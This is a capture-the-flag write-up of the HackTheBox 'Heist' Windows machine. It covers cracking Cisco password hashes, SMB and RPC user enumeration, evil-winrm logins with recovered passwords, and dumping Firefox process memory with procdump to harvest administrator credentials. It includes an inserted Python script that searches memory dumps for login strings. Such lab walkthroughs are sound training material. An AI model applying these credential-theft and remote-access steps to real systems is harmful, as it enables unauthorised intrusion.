Heist-HTB-Writeup

Faris
4 min read · Jul 7, 2021

Today I'm going to solve this Windows machine.

Starting with an Nmap scan as usual.

Here are the scan results:

Nmap scan

Let's set this aside for a while and check the web page.

I found a simple login page, and interestingly it lets us log in as a guest.

login page
issues page

After logging in as a guest I found this issues page, where the user Hazard has an issue with his Cisco router and shared an attachment. It could be useful.

config.txt

Cool, he shared a config sample that contains 2 usernames and 3 passwords.

rout3r password
admin password

I used John the Ripper to crack the Cisco type 5 password.

type 5 password cracked

This password must belong to the user Hazard, who shared the config file.

After many tries I wasn't able to log in with any user on the login page, even after appending @heist.htb to every username, so I tried SMB with smbmap instead. The only useful user was hazard, and I found this:

smbmap -u hazard -p stealth1agent -H heist.htb

Only IPC$ was accessible, and only read-only. After some more searching it turned out that it's possible to log in via rpcclient as hazard.

So I used lookupsid.py and found that there are other users.

python3 lookupsid.py hazard:stealth1agent@heist.htb

Using evil-winrm, we got a shell as the user chase.

evil-winrm -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d'
user chase shell

And finally we got the user flag.

1st flag

So now it's time to escalate to the system's Administrator.

After a lot of searching there weren't many files I was able to access, but we can see that there is a directory called wwwroot in C:\inetpub that we can access but can't list. If you remember, at the beginning we tried to log in through a login.php page; it could be stored inside wwwroot. I tried reading it directly and succeeded:

cat C:\inetpub\wwwroot\login.php

And found this piece of valuable PHP code:

admin credentials

It has admin credentials, but we need to crack this hash first:

91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040

As usual I tried john with rockyou.txt but got nothing.

failed

After failing to crack the hash, I checked the processes running on the machine.

processes running on the machine

Not really interesting, but it's the second time Firefox shows up (the first was in Documents). Let's analyze these processes with procdump, uploading it through the evil-winrm session:

upload /path_to_procdump_on_attacking_machine

I will dump them one at a time, in ascending PID order:

./procdump64.exe -ma "pid"

I tried reading it on the machine, but it's harder to see there, so I downloaded it instead:

download file_name

Finally, after the download is done, we have the dump. It's time to search for what we need.

Quick tip: you don't need to download the whole file if it takes too long. Downloading 15% was enough for me.

Unfortunately the Linux machine kept lagging every time I tried to open the file, and grep was of little use on its own: it only confirms whether what you search for is present or not.

So I used Notepad on Windows instead, and it was pretty fast to get the password.

password

As you can see, the password is for admin@support.htb:

admin@support.htb:4dD!5}x/re8]FBuZ
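An added example for the dump-search step above (my own code, not the author's): it streams the procdump file in chunks and returns the printable bytes around each hit, so a multi-hundred-MB dump never has to be loaded into an editor or hung on grep. It assumes the browser kept the login form body URL-encoded in memory, hence the search term admin%40support.htb; the sample dump, its layout and the password value in it are constructed placeholders, not data from the box.

```python
import os, tempfile

# Constructed sample only: a URL-encoded login form body as a browser might hold
# it in memory; the password value is a placeholder, not the box's real one.
SAMPLE_CRED = b"login_username=admin%40support.htb&login_password=EXAMPLE_PASS_ONLY"

def _printable(raw):
    """Render bytes like `strings` would, one '.' per non-printable byte."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)

def find_context(path, needle, before=32, after=64, chunk_size=1 << 20):
    """Return [(offset, context)] for each occurrence of needle, reading in chunks
    and carrying a tail so a hit straddling a chunk boundary is found exactly once."""
    if isinstance(needle, str):
        needle = needle.encode()
    keep = len(needle) - 1 + before  # tail length needed to catch boundary hits
    hits, buf, base = [], b"", 0     # base = absolute file offset of buf[0]
    with open(path, "rb") as f:
        while True:
            data = f.read(chunk_size)
            eof = not data
            buf += data
            pos = 0
            while (i := buf.find(needle, pos)) >= 0:
                end = i + len(needle) + after
                if end > len(buf) and not eof:
                    break  # defer: the next chunk is needed for the 'after' context
                hits.append((base + i, _printable(buf[max(0, i - before):end])))
                pos = i + 1
            if eof:
                return hits
            deferred = i if i >= 0 else len(buf)  # i is the deferred hit, if any
            cut = max(pos, min(deferred - before, len(buf) - keep), 0)
            base, buf = base + cut, buf[cut:]  # drop processed bytes, keep the tail

def build_sample_dump(path, chunk_size=1024):
    """Write a constructed dump: zero filler with the form body placed so the
    first copy straddles a chunk boundary and the second ends right at EOF."""
    blob = (b"\x00" * (chunk_size - 10) + SAMPLE_CRED
            + b"\x00" * 500 + SAMPLE_CRED + b"\x00" * 7)
    with open(path, "wb") as f:
        f.write(blob)
    return len(blob)

if __name__ == "__main__":
    dump = os.path.join(tempfile.mkdtemp(), "firefox.dmp")
    build_sample_dump(dump)
    for off, ctx in find_context(dump, "admin%40support.htb", 15, 40, 1024):
        print(f"{off:#010x}: {ctx}")
```

On a real dump, point `find_context` at the downloaded .dmp with the default chunk size and search for the account name; the context string is what Notepad showed the author, without opening the whole file.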

We can log in with these credentials on the login.php page, but nothing new was there.

Let's try Evil-WinRM again, but as administrator this time:

evil-winrm -i heist.htb -u administrator -p '4dD!5}x/re8]FBuZ'

Bingo. We are logged in as administrator and finally got root.txt.

root.txt

I hope this was an easy, simple writeup.

Give it a respect on HTB, it won't take a minute.
